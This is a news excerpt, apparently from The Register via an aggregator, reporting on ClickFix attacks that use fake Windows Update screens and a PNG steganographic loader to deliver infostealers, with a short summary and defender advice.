"A fresh wave of ClickFix attacks is using fake Windows update screens to trick victims into downloading infostealer malware. ClickFix is a type of social engineering technique that tricks users into running malicious commands on their own machines, typically using fake fixes or I-am-not-a-robot prompts. These types of attacks have surged over the past year, with both government-sponsored spies and cybercriminal gangs deploying this technique to deliver malware. According to Microsoft, ClickFix is now the most common initial access method for attackers."
"Recent ClickFix attacks are moving away from the robot-check lures and instead using "highly convincing" phony Windows update screens, according to Huntress security analysts Ben Folland and Anna Pham. In another new twist, the malware slingers use a steganographic loader to deliver infostealing malware, including Rhadamanthys, by encoding malicious code directly into the pixel data of PNG images and then using specific color channels to reconstruct and decrypt the malware in memory. This technique also helps the malicious payloads to evade signature-based detection."
"These campaigns start with victims visiting a malicious website that causes their browsers to enter full-screen mode and display a blue Windows Update screen like this one shared on social media. If users fall for the scam, they're urged to install a "critical security update" via the typical ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command."
ClickFix leverages social engineering to trick users into running malicious commands via fake prompts or Windows Update screens in full-screen browser windows. Attackers urge victims to paste and execute a "critical security update" command in the Run prompt, initiating a multi-stage chain. Campaigns use steganographic loaders that embed malicious code into PNG pixel data and reconstruct and decrypt payloads in memory using specific color channels. Those loaders deliver infostealers such as Rhadamanthys and help evade signature-based detection. Defenders should watch for suspicious IPs, full-screen update-like pages, and Run-prompt command activity.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]